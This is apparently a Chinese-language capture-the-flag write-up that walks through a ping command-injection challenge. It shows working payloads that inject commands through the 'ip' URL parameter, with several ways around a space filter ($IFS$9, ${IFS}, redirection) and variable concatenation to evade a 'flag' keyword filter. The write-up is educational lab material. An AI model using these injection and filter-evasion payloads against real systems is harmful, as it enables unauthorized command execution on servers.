打开靶机,提示get传参
直接?ip=127.0.0.1
返回ping的结果,接着试一下命令执行?ip=127.0.0.1|ls
发现疑似flag的flag.php,试一下能不能直接读出来?ip=127.0.0.1|cat flag.php
果然没这么简单,空格被过滤了,百度了一下绕过的方法
cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
挨个试一下,发现只有$IFS$9可行,继续尝试读flag,?ip=127.0.0.1|cat$IFS$9flag.php
发现flag也被过滤了,思路又断了,继续百度,发现别人的思路是先读一下index.php
?ip=127.0.0.1|cat$IFS$9index.php
里面有waf的代码 ,可以看到,flag的过滤采用的是贪婪匹配:
当正则表达式中包含能接受重复的限定符时,通常的行为是(在使整个表达式能得到匹配的前提下)匹配尽可能多的字符。例如以下表达式将匹配以a开始,以b结束的最长字符串:
a.*b
如果用来搜索“aabab”,它会匹配整个字符串“aabab”。这就是贪婪匹配。
所以我们可以采用拼接字符串的方法绕过flag的贪婪匹配,如下
(由于是贪婪匹配,所以fl应该放在ag.php后面)
所以最终的payload:?ip=127.0.0.1;a=ag.php;b=fl;cat$IFS$9$b$a;
没有报错了,看一下源码
成功
参考的是这篇文章:大佬还有两种方法